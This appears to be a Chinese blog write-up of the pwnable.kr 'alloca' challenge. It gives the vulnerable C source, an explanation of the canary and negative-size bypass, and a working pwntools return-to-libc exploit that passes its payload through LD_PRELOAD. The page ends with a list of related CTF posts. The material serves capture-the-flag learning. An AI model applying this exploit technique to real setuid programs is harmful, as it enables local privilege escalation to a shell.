0x00:

好久没玩了...去年十月以后就没玩过了TAT 这几天把peach的坑,winafl的坑填了下,就来搞下pwn。

0x01:

这个程序是给了源码的

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

void clear_newlines(){

    int c;

    do{

        c = getchar();

    }while (c != '\n' && c != EOF);

}

int g_canary;

int check_canary(int canary){

    int result = canary ^ g_canary;

    int canary_after = canary;

    int canary_before = g_canary;

    printf("canary before using buffer : %d\n", canary_before);

    printf("canary after using buffer : %d\n\n", canary_after);

    if(result != 0){

        printf("what the f...??? how did you fucked this buffer????\n");

    }

    else{

        printf("I told you so. its trivially easy to prevent BOF :)\n");

        printf("therefore as you can see, it is easy to make secure software\n");

    }

    return result;

}

int size;

char* buffer;

int main(){

    printf("- BOF(buffer overflow) is very easy to prevent. here is how to.\n\n");

    sleep(2);

    printf("   1. allocate the buffer size only as you need it\n");

    printf("   2. know your buffer size and limit the input length\n\n");

    printf("- simple right?. let me show you.\n\n");

    sleep(2);

    printf("- whats the maximum length of your buffer?(byte) : ");

    scanf("%d", &size);

    clear_newlines();

        printf("- give me your random canary number to prove there is no BOF : ");

        scanf("%d", &g_canary);

        clear_newlines();

    printf("- ok lets allocate a buffer of length %d\n\n", size);

    sleep(1);

    buffer = alloca( size + 4 );    // 4 is for canary

    printf("- now, lets put canary at the end of the buffer and get your data\n");

    printf("- don't worry! fgets() securely limits your input after %d bytes :)\n", size);

    printf("- if canary is not changed, we can prove there is no BOF :)\n");

    printf("$ ");

    memcpy(buffer+size, &g_canary, 4);    // canary will detect overflow.

    fgets(buffer, size, stdin);        // there is no way you can exploit this.

    printf("\n");

    printf("- now lets check canary to see if there was overflow\n\n");

    check_canary( *((int*)(buffer+size)) );

    return 0;

}

主要还是需要突破他的防护,拿到shell。

看下bin文件开了什么保护:

调试发现,check_canary()函数返回的时候,如果恰当的设置g_canary的值,就可以控制返回地值。



然后我就卡在这里了...开启了NX,只能ROP的思路搞,但是ROP链又不知道哪里放置。

0x02:

后来参考了别人的做法,才发现这是个本地利用...直接按照以前玩overthewire学来的套路就可以:sc放在环境变量离,然后确定地址,直接改返回地值过去就可以了。

不过首先要利用ulimit -s unlimited去固定下libc的加载地址,然后才可以确定system()和/bin/sh地址。

附上我本地调试的时候的exp,环境不同,所以地址可能不同。

from pwn import *

import os

off_system  = 0x0003d3e0    # objdump -d /lib/i386-linux-gnu/libc.so.6 | grep system

off_shell   = 0x0015ea69    # grep -oba /bin/sh /lib/i386-linux-gnu/libc.so.6

adr_libc    = 0x40047000    # ldd alloca

adr_payload = 0x40025857    # searchmem "AAAA"

payload     =   p32(adr_libc + off_system)

payload     +=  p32(0xdeadbeef)

payload     +=  p32(adr_libc + off_shell)

#test = "AAAABBBBCCCC"

#p = process('./alloca', env = {'LD_PRELOAD': test})

p = process('./alloca', env = {'LD_PRELOAD': payload})

#raw_input("$$")

p.sendline(str(-92))

p.sendline(str((adr_payload + 4) ^ 0x08048250))

p.interactive()

'''

0x40025857 ^ 0x08048250 --> 0x4806da07

Cannot access memory at address 0x4806da03

0x40025857 + 4

'''

0x03:参考链接

http://0byjwzsf.me/2016/08/08/pwnable-rookiss-alloca/#more

[pwnable.kr]--alloca的更多相关文章

  1. pwnable.kr的passcode

    前段时间找到一个练习pwn的网站,pwnable.kr 这里记录其中的passcode的做题过程,给自己加深印象. 废话不多说了,看一下题目, 看到题目,就ssh连接进去,就看到三个文件如下 看了一下 ...

  2. pwnable.kr bof之write up

    这一题与前两题不同,用到了静态调试工具ida 首先题中给出了源码: #include <stdio.h> #include <string.h> #include <st ...

  3. pwnable.kr col之write up

    Daddy told me about cool MD5 hash collision today. I wanna do something like that too! ssh col@pwnab ...

  4. pwnable.kr brainfuck之write up

    I made a simple brain-fuck language emulation program written in C. The [ ] commands are not impleme ...

  5. pwnable.kr login之write up

    main函数如下: auth函数如下: 程序的流程如下: 输入Authenticate值,并base64解码,将解码的值代入md5_auth函数中 mad5_auth()生成其MD5值并与f87cd6 ...

  6. pwnable.kr详细通关秘籍(二)

    i春秋作家:W1ngs 原文来自:pwnable.kr详细通关秘籍(二) 0x00 input 首先看一下代码: 可以看到程序总共有五步,全部都满足了才可以得到flag,那我们就一步一步来看 这道题考 ...

  7. pwnable.kr simple login writeup

    这道题是pwnable.kr Rookiss部分的simple login,需要我们去覆盖程序的ebp,eip,esp去改变程序的执行流程   主要逻辑是输入一个字符串,base64解码后看是否与题目 ...

  8. pwnable.kr第二天

    3.bof 这题就是简单的数组越界覆盖,直接用gdb 调试出偏移就ok from pwn import * context.log_level='debug' payload='A'*52+p32(0 ...

  9. [pwnable.kr]Dragon

    0x00: dragon 是一个UAF漏洞的利用. UseAfterFree 是堆的漏洞利用的一种 简单介绍 https://www.owasp.org/index.php/Using_freed_m ...

随机推荐

  1. Java实现AES对称加密算法

    Java代码实现 import java.security.SecureRandom; import javax.crypto.Cipher; import javax.crypto.KeyGener ...

  2. 遗传算法与Java代码简单实现

    参阅地址: https://www.jianshu.com/p/ae5157c26af9 代码实现: public class GA { private int ChrNum = 10; //染色体数 ...

  3. Dev-C++的一些使用技巧快捷键

    最近开始用Dev-C++在Window下编程,感觉Dec-C++是一款挺不错的C++编译器.下载地址http://www.duote.com/soft/9830.html .现总结一些使用技巧: 1. ...

  4. Ioc和Aop底层原理

    Spring中主要用到的设计模式有工厂模式和代理模式. IOC:Inversion of Control控制反转,也叫依赖注入,通过 sessionfactory 去注入实例:IOC就是一个生产和管理 ...

  5. vue学习(5)-评论功能(利用父组件的方法)

    <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...

  6. vue访问本地文件404

    用了vue cli3.0用axios调用本地json数据一直报404,找了半天郁闷,最后发现原因是,vue cli3.0 public 文件夹才是静态资源文件,问题解决,记录一下,以后不再踩坑.

  7. mybatis批量更新表setting parameters 错误

    mybatis中想用 foreach标签 批量update set表 下面是mapper.xml <update id="updateMonitorById" paramet ...

  8. 乐观锁之版本号机制和CAS

    ---恢复内容开始--- 乐观锁:每次去拿数据的时候,都认为别人不会修改,不会加锁,但在更新的时候会去判断一下,此期间别人有没有更新数据,版本号机制和CAS算法就用到乐观锁,参考了https://bl ...

  9. vue+ckEditor5

    1.安装依赖 "@ckeditor/ckeditor5-build-balloon": "^10.1.0", "@ckeditor/ckeditor5 ...

  10. mint-ui下拉加载(项目实例)

    <template> <div class="share"> <div class="header"> <div cl ...